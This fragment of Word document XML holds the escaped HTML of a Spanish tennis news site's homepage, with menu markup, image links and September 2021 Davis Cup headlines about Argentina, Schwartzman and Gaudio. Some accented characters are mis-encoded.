    <w:p w14:paraId="0F2C0E8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href = "http://todosobretenis.com/" &gt; &lt; img src = "http://todosobretenis.com/wp-content/uploads/2019/01/tstchico.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283670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"Todo Sobre Tenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9798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data - rjs = "2" / &gt; &lt; /a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CFD2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h1 class = "mvp-logo-title" &gt; Todo Sobre Tenis &lt; /h1&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB8F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/div&gt;&lt;!--mvp-nav-top-mid--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280D9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/div&gt;&lt;!--mvp-nav-top-left-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419FD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/div&gt;&lt;!--mvp-nav-top-left-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E68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/div&gt;&lt;!--mvp-nav-top-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036DB6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/div&gt;&lt;!--mvp-nav-top-right-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2306C3D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"mvp-nav-top-right" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559344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DB6D97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"mvp-nav-search-but fa fa-search fa-2 mvp-search-click" &gt; &lt; /span&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC12E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/div&gt;&lt;!--mvp-nav-top-right--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20302B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/div&gt;&lt;!--mvp-nav-top-right-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F83B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/div&gt;&lt;!--mvp-nav-top-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3808A9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/div&gt;&lt;!--mvp-main-box--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57D4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/div&gt;&lt;!--mvp-main-nav-top--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279028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"mvp-main-nav-bot"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E884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713EDB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3783A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"mvp-main-nav-bot-cont"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B9B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"left" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18DC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7C6CD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"mvp-main-box" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B48B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96497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"mvp-nav-bot-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031814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"left" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC650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C0FE76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div class = "mvp-nav-bot-right-out left" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D9D7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5FE64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"mvp-nav-bot-right-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B520D3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5D0AD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"mvp-nav-bot-cont left" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119FB0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648BE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"mvp-nav-bot-left-out" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA9B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ABE34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"mvp-nav-bot-left left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE9E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C0374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"mvp-fly-but-wrap mvp-fly-but-click left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9484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BAD20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5BBE4F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2EF4D8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021307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&gt; &lt; /span&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12CF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/div&gt;&lt;!--mvp-fly-but-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6F3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/div&gt;&lt;!--mvp-nav-bot-left--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B98D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"mvp-nav-bot-left-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C8B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1F6DD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"mvp-nav-menu left" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F73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E30DE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"menu-mobila-container" &gt; &lt; ul id = "menu-mobila-1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E581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"menu" &gt; &lt; li class = "menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-1619" &gt; &lt; a href = "http://todosobretenis.com/" &gt; Home &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7C6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34090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class = "menu-item menu-item-type-post_type menu-item-object-page menu-item-1620" &gt; &lt; a href = "http://todosobretenis.com/escribi-en-la-web/" &gt; EscribÃ­ en la web &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0C4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5A920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class = "menu-item menu-item-type-post_type menu-item-object-page menu-item-1621" &gt; &lt; a href = "http://todosobretenis.com/anuncia-en-tst/" &gt; Anuncia en TST &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144872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A69EE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class = "menu-item menu-item-type-post_type menu-item-object-page menu-item-1622" &gt; &lt; a href = "http://todosobretenis.com/sobre-nosotros/" &gt; Sobre Nosotros &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEEB8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D3296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/ul&gt;&lt;/div &gt; &lt; /div&gt;&lt;!--mvp-nav-menu--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD38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/div&gt;&lt;!--mvp-nav-bot-left-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D84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/div&gt;&lt;!--mvp-nav-bot-left-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344FC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/div&gt;&lt;!--mvp-nav-bot-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E9F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/div&gt;&lt;!--mvp-nav-bot-right-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285677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"mvp-nav-bot-right left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826F9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A2F28A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"mvp-nav-search-but fa fa-search fa-2 mvp-search-click" &gt; &lt; /span&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E381A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/div&gt;&lt;!--mvp-nav-bot-right--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795362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/div&gt;&lt;!--mvp-nav-bot-right-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE8B9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/div&gt;&lt;!--mvp-nav-bot-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112AB6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/div&gt;&lt;!--mvp-main-nav-bot-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB829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/div&gt;&lt;!--mvp-main-box--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2625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/div&gt;&lt;!--mvp-main-nav-bot--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54824A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/nav&gt;&lt;!--mvp-main-nav-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256778D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/header&gt;&lt;!--mvp-main-head-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9429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"mvp-main-body-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08163D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 &lt; div class = "mvp-main-box" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584EB9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F25677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section id = "mvp-feat1-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE7E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163A235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F6A88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"mvp-feat1-right-out left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4504D7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5DF1E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"mvp-feat1-right-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA26F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19732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"mvp-feat1-main left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C31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79358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"mvp-feat1-left-wrap relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB596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34D97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"http://todosobretenis.com/argentina-y-brasil-clasificaron-a-los-qualifiers-de-copa-davis/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C954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20CC0A6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EB7C0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"mvp-feat1-feat-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E7F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07552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"mvp-feat1-feat-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF59E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DD81A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"560"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C46C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"600"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327388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"http://todosobretenis.com/wp-content/uploads/2021/09/321482-560x600.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B17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"attachment-mvp-port-thumb size-mvp-port-thumb wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC577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 / &gt; &lt; /div&gt;&lt;!--mvp-feat1-feat-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8985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"mvp-feat1-feat-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD6D2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853F1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676C1FC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A0C78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0B70F0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6BCC6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13131A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Argentina y Brasil clasificaron a los Qualifiers de Copa Davis &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED9C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PerÃº tambiÃ© n ganÃ³ y jugarÃ¡ un repechaje en noviembre,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89D9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mientras que Chile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D5D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Uruguay y Bolivia cayeron este fin de semana. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD4176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/div&gt;&lt;!--mvp-feat1-feat-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029270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/div&gt;&lt;!--mvp-feat1-feat-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7C2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29F740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"mvp-feat1-sub-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D603C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FF1C9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"http://todosobretenis.com/gaudio-confirmo-su-salida-del-equipo-de-copa-davis/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D168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318FB6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159E3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"mvp-feat1-sub-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069838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AE6D4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"mvp-feat1-sub-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548001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DD739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"590"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7011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"354"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB113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"http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-590x354.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339F7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01E2360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5E3F63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"http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-590x354.jpeg 590w, http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-400x240.jpeg 400w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE4D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590px) 100vw, 590px" / &gt; &lt; img width = "400"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B2C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63CAF1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src = "http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9428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7DF173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32F6D8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"http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_gXDy2XMAQ0uG8-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E054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/div&gt;&lt;!--mvp-feat1-sub-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312BF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"mvp-feat1-sub-text" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150E6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79691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765819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CB29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090F25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51297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549F2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Gaudio confirmÃ³ su salida del equipo de Copa Davis &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9B1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/div&gt;&lt;!--mvp-feat1-sub-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BDA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/div&gt;&lt;!--mvp-feat1-sub-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDB8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6B0005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"http://todosobretenis.com/argentina-sello-la-serie-ante-bielorrusia/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF012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67154F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78E0D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"mvp-feat1-sub-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB87E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3D26E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"mvp-feat1-sub-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE2C0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84C01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"570"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8E6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"321"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FEF0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"http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462B4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79C47A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01AD06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"http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705.jpeg 570w, http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705-300x169.jpeg 300w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E146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570px) 100vw, 570px" / &gt; &lt; img width = "400"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57E9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5DB0D6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"http://todosobretenis.com/wp-content/uploads/2021/09/i-e1632075421705-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424D0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736709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 / &gt; &lt; /div&gt;&lt;!--mvp-feat1-sub-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F15A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"mvp-feat1-sub-text" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10258D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BBA61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0843D1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CAAB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762008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5E3EF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476CF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Argentina sellÃ³ la serie ante Bielorrusia con una categÃ³ rica victoria de Schwartzman &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D119A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/div&gt;&lt;!--mvp-feat1-sub-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57571C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/div&gt;&lt;!--mvp-feat1-sub-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED74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07AB8F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/div&gt;&lt;!--mvp-feat1-sub-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB86D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/div&gt;&lt;!--mvp-feat1-left-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E48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"mvp-feat1-mid-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35003A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4DC96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h3 class = "mvp-feat1-pop-head" &gt; &lt; span class = "mvp-feat1-pop-head" &gt; Popular &lt; /span&gt;&lt;/h3 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95D9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8D495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"mvp-feat1-pop-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6EDD0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E21CC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"http://todosobretenis.com/schwartzman-abrira-la-serie-ante-bielorrusia/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9BE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4DCCC2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3566D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"mvp-feat1-pop-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA61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A2C52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"mvp-feat1-pop-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515879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A4C8D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75EC39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0262C2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"http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BFA3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4FEE0C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A5901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"http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E83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4D4A090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2C48D1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"http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A71A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25BCAB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520B423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"http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7DD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/div&gt;&lt;!--mvp-feat1-pop-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F001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"mvp-feat1-pop-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BFA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446A9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75E207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B4DE9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7711B8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DD077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19153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Schwartzman abrirÃ¡ la serie de Copa Davis ante Bielorrusia &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4060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/div&gt;&lt;!--mvp-feat1-pop-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1EC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/div&gt;&lt;!--mvp-feat1-pop-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF93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255CC2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"http://todosobretenis.com/dura-derrota-de-schwartzman-y-contundente-victoria-de-pella-ante-bielorrusia/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292CB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04980D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83D9A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"mvp-feat1-pop-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4C2C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B47CE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"mvp-feat1-pop-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4A1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456CD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01059F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4FB85C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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA30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77D6D5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07C502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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BD8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5D82C4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7CC5A3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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529BE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6D7C06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alt = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1772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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-150x150.jpeg 150w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-300x300.jpeg 300w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-768x768.jpeg 768w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-1024x1024.jpeg 1024w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft.jpeg 1080w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008810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/div&gt;&lt;!--mvp-feat1-pop-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF53C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"mvp-feat1-pop-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2124B1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7AD0C7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64C52A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AEDB3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0C162B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981BB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110C8D0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Dura derrota de Schwartzman y contundente victoria de Pella ante Bielorrusia &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AAB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/div&gt;&lt;!--mvp-feat1-pop-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D84C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/div&gt;&lt;!--mvp-feat1-pop-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500468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5421CE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"http://todosobretenis.com/schwartzman-estaba-en-un-dia-en-el-que-nada-iba-a-salir/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF15D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9A6E1B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22F49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"mvp-feat1-pop-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1FFF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59ED6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"mvp-feat1-pop-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A8E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9551C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412B49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34A24A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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104F8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46B61B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534812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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC63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038D41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5D262E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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE53A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2110D8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E5EDA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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EBC2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/div&gt;&lt;!--mvp-feat1-pop-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A871D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"mvp-feat1-pop-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9165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0E62A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8F5AF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46135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5059A4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A0AC6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2A6E4AC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Schwartzman: &amp; #8220;&amp;# 8221;Estaba en un dÃ­ a en el que nada iba a salir &amp; #8221;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437C7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&lt;/div&gt;&lt;!--mvp-feat1-pop-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE5CF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&lt;/div&gt;&lt;!--mvp-feat1-pop-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357117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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB8D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&lt;a href= "http://todosobretenis.com/argentina-vs-bielorrusia-marcaria-la-despedida-de-gaston-gaudio/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266373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043B4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07C7F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"mvp-feat1-pop-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5342BF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2B170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"mvp-feat1-pop-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46BF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12B2F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60C995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307131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"http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018A40C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2FE441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2B392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"http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BA4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3FAFCB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5622C3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"http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9C5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2219B2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EF0A05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"http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0044A0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/div&gt;&lt;!--mvp-feat1-pop-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDEF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"mvp-feat1-pop-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5766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9F914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5389395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26A147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4A9F69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08DF9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1A6C5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Argentina vs Bielorrusia marcarÃ­ a la despedida de GastÃ³ n Gaudio &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EFF5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/div&gt;&lt;!--mvp-feat1-pop-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A858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/div&gt;&lt;!--mvp-feat1-pop-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FCB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6FFBC87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"http://todosobretenis.com/un-total-de-10-paises-buscan-la-clasificacion-a-los-qualifiers-de-la-copa-davis/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29476F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348E5B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45130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"mvp-feat1-pop-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE79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B4F30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"mvp-feat1-pop-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815B6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3FC30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4CEEB3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7C63F5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"http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DBFB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0F4D0E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A27E3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"http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A89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518DCD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481E4C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"http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56A4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0FE6DA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661D8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"http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A86E5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/div&gt;&lt;!--mvp-feat1-pop-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629CC5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"mvp-feat1-pop-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356B8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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2D9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39CC50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E36ED7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4C41F0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8C4EB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59A9F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Un total de 10 paÃ­ ses buscan la clasificaciÃ³ n a los Qualifiers de la Copa Davis &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ECE1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/div&gt;&lt;!--mvp-feat1-pop-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45885F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/div&gt;&lt;!--mvp-feat1-pop-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6B8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19B58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/div&gt;&lt;!--mvp-feat1-pop-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD26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/div&gt;&lt;!--mvp-feat1-mid-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A5EF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/div&gt;&lt;!--mvp-feat1-main--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E82E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/div&gt;&lt;!--mvp-feat1-right-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59BF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"mvp-feat1-right-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74024F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7C2FA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"mvp-feat1-list-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FEB5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9948C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"mvp-feat1-list-head-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF81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DB97C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ul class = "mvp-feat1-list-buts left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF98F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3F567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class = "mvp-feat-col-tab" &gt; &lt; a href = "#mvp-feat-tab-col1" &gt; &lt; span class = "mvp-feat1-list-but" &gt; Lo Ãºltimo &lt; /span&gt;&lt;/a &gt; &lt; /li&gt; &lt;</w:t>
